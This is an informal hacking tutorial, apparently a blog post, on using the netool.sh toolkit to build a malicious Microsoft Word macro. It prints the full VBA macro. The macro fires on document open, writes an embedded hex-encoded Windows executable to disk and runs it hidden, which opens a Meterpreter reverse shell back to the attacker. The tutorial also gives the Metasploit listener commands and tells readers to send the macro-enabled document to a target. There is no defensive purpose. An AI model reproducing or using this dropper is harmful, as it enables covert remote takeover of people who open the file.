Welcome in the 4th part of this serie. Today we're going to use one of the best toolkit ever seen. The name of this toolkit is netool.sh
( http://ddosdipdye.weebly.com/blog/netoolssh ).
The process is really simple, run netool.sh and go to
( 8. rootsector exploits [msf+apache+ettercap+priv8.sh] )
and sellect it with the command 8.
Than go to ( 17 - macro VBS injection [microsoft word macro] )
And select it with the comand 17.
Type in your LHOST (192.168.x.x)
and your LPORT (443)
Than your name (Whateveryouwant.vbs)
And your payload will generate:
output:
Payload [VBS] Final Config:
===========================
LHOST : 192.168.x.x
LPORT : 443
FILENAME : test.vbs
STORAGE IN : /root/opensource/priv8/test.vbs
PAYLOAD : windows/meterpreter/reverse_tcp
AFFECTED SYSTEMS : microsoft word doc (windows OS)
Type 2 times q yo exit the toolkit and move to the output dir. (cd priv8)
and cat yourname.vbs
output:
Sub Auto_Open()
Qgber12
End Sub
Sub Qgber12()
Dim Qgber7 As Integer
Dim Qgber1 As String
Dim Qgber2 As String
Dim Qgber3 As Integer
Dim Qgber4 As Paragraph
Dim Qgber8 As Integer
Dim Qgber9 As Boolean
Dim Qgber5 As Integer
Dim Qgber11 As String
Dim Qgber6 As Byte
Dim Giozblymik as String
Giozblymik = "Giozblymik"
Qgber1 = "ZlwVUZOj.exe"
Qgber2 = Environ("USERPROFILE")
ChDrive (Qgber2)
ChDir (Qgber2)
Qgber3 = FreeFile()
Open Qgber1 For Binary As Qgber3
For Each Qgber4 in ActiveDocument.Paragraphs
DoEvents
Qgber11 = Qgber4.Range.Text
If (Qgber9 = True) Then
Qgber8 = 1
While (Qgber8 < Len(Qgber11))
Qgber6 = Mid(Qgber11,Qgber8,4)
Put #Qgber3, , Qgber6
Qgber8 = Qgber8 + 4
Wend
ElseIf (InStr(1,Qgber11,Giozblymik) > 0 And Len(Qgber11) > 0) Then
Qgber9 = True
End If
Next
Close #Qgber3
Qgber13(Qgber1)
End Sub
Sub Qgber13(Qgber10 As String)
Dim Qgber7 As Integer
Dim Qgber2 As String
Qgber2 = Environ("USERPROFILE")
ChDrive (Qgber2)
ChDir (Qgber2)
Qgber7 = Shell(Qgber10, vbHide)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
'**************************************************************
'*
'* PAYLOAD DATA
'*
'**************************************************************
Giozblymik
&H4D&H5A&H90&H00&H03&H00&H00&H00&H04&H00&H00&H00&HFF&HFF&H00&H00&HB
8&H00&H00&H00&H00&H00&H00&H00&H40&H00&H00&H00&H00&H00&H00&H00&H00&H0
0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H0
0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H80&H00&H00&H00&H0E&H1F&HBA&H0
E&H00&HB4&H09&HCD&H21&HB8&H01&H4C&HCD&H21&H54&H68&H69&H73&H20&H70&H
72&H6F&H67&H72&H61&H6D&H20&H63&H61&H6E&H6E&H6F&H74&H20&H62&H65&H20&H
72&H75&H6E&H20&H69&H6E&H20&H44&H4F&H53&H20&H6D&H6F&H64&H65&H2E&H0D&H
0D&H0A&H24&H00&H00&H00&H00&H00&H00&H00&H50&H45&H00&H00&H4C&H01&H03&H
00&H10&HD9&H6B&H97&H00&H00&H00&H00&H00&H00&H00&H00&HE0&H00&H0F&H03&H
0B&H01&H02&H38&H00&H02&H00&H00&H00&H0E&H00&H00&H00&H00&H00&H00&H00&H
10&H00&H00&H00&H10&H00&H00&H00&H20&H00&H00&H00&H00&H40&H00&H00&H10&H
00&H00&H00&H02&H00&H00&H04&H00&H00&H00&H01&H00&H00&H00&H04&H00&H00&H0
0&H00&H00&H00&H00&H00&H40&H00&H00&H00&H02&H00&H00&H46&H3A&H00&H00&H02
&H00&H00&H00&H00&H00&H20&H00&H00&H10&H00&H00&H00&H00&H10&H00&H00&H10&
H00&H00&H00&H00&H00&H00&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H
00&H00&H30&H00&H00&H64&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H
00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&
H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&
H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H
00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H0
0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H2E&H74&H65&H78&H74&
H00&H00&H00&H28&H00&H00&H00&H00&H10&H00&H00&H00&H02&H00&H00&H00&H02&H00&H00&H
00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&H60&H2E&H64&H61&H
74&H61&H00&H00&H00&H90&H0A&H00&H00&H00&H20&H00&H00&H00&H0C&H00&H00&H00&H04&H
00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H20&H00&H30&HE0&H2E&H6
9&H64&H61&H74&H61&H00&H00&H64&H00&H00&H00&H00&H30&H00&H00&H00&H02&H00&H00&H00
&H10&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H40&H00&H30&HC0&H
00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HB8&H00&H20&H40&
H00&HFF&HE0&H90&HFF&H25&H38&H30&H40&H00&H90&H90&H00&H00&H00&H00&H00&H00&H00&H00
&HFF&HFF&HFF&HFF&H00&H00&H00&H00&HFF&HFF&HFF&HFF&H00&H00&H00&H00&H00&H00&H00&H00&
H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H
00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H
00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H0
0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H
00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H0
0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&
H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H
00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&
H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H0
0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H0
0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H0
0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H0
0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H
00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&
H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00
&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H0
0&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&H00&HDB&H
CD&HD9&H74&H24&HF4&H5A&HBB&H27&HBD&HBB&H29&H31&HC9&H66&HB9&H04&H02&H31&H5A&H1A&H03&H5
A&H1A&H83&HEA&HDB&H5F&H4E&H18&HE3&HC8&HB9&H4B&HA3&H08&HDE&H94&H13&H6D&H97&H4B&HEC&HD6
&HD6&HFE&H9A&HF3&HDE&HD8&HEE&H27&H15&H81&H3D&HE1&H64&H7D&HC2&H32&H82&HB3&HBF&HA5&H88&
HC8&H2E&H24&HC0&HA3&HCD&HA2&H6D&HD5&HB3&HD9&HB4&HA1&H24&HB5&H9A&H6A&H7A&HD2&H32&H18&
H96&H35&H40&H04&H00&H22&HE7&H01&H03&H59&H8C&HF6&H4B&H56&H78&H11&H39&H34&HA8&H16&HD6&H2
6&H95&HAF&H83&H96&H29&HF4&HB7&H95&HCB&H47&H36&H7D&H8E&HBF&H61&H4C&H34&H2B&HB8&HA2&H53&
HDE&H9B&H8D&HBA&HF3&H3E&H32&HAD&H3D&H2A&H5B&H14&H8F&H72&H21&HE0&H08&H93&H4F&H06&H71&H0
E&H1B&H4C&HD3&H2A&H63&H9E&HED&H12&H91&H83&HEC&H80&H45&H62&H88&H40&H26&H7A&HF6&H7C&H4E&
HBD&H18&H46&H5C&HCC&H76&HE8&H8F&H8D&H4C&H4F&H68&H77&H46&H85&H92&H36&HD7&HEF&H5A&H50&H
71&H1D&H32&HB4&HB6&HDD&H5C&H04&HC4&H0C&H19&HA4&H01&H53&H08&HDA&H60&HD6&HEF&H6E&H05&H6
7&H9A&HBD&H0B&H8B&HB9&H55&HDA&H70&HE0&HE1&H98&H8C&HFD&H5D&H6D&H49&H4B&H5A&H95&H41&H05
&H0D&HAD&H84&H09&H18&HFA&H1F&H11&H92&HE2&H25&H27&HC5&H61&HAC&HC5&H44&HF9&H11&HB1&HED&H
84&HA5&HA1&H0D&H00&H73&H25&H5C&H98&HAC&H41&HBB&HF0&HEF&H39&HB6&H2E&H25&H47&H5D&H8C&HF
2&H89&H5E&H54&HC8&H53&HC0&H9B&H52&HF6&HC2&HC9&HA1&H98&HE9&HBF&H41&H1F&HC7&H7B&H49&H1
1&H65&HF4&H42&H5A&HDC&H2B&HA0&HF6&H14&HCB&H42&HD4&H8D&HBF&H6F&HAB&H3B&H33&HCD&H9E
And much more stuff ;)
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.x.x
set LPORT 443
exploit
And switch to a windows box and open microsoft word or microsoft exel. Go to the 'view' tab, select the macro's button
and then view macro's
Add a new macro (Just give it the name you want)and press create.
(You can do all this steps in one just Hit alt+F11).
Remove the things your document standard creates and paste in the generated macro code into the editor. Just close the macro editor and do one of the most important steps of this tutorial! Save the file as WhateverYouWant.docm (Macro-Enabled document) or WhateverYouWant.doc (Must be word 97-2003 Document!)
Press save and send your file to your target. Switch back to the system you're running your metasploit listener on.
And pwned it again. Bye
@ClaimItToYou
Ps. If you want to follow the creator of netool.sh here is his twitter
pedr0: https://twitter.com/pedro31851511
Claimittoyou: https://twitter.com/ClaimItToYou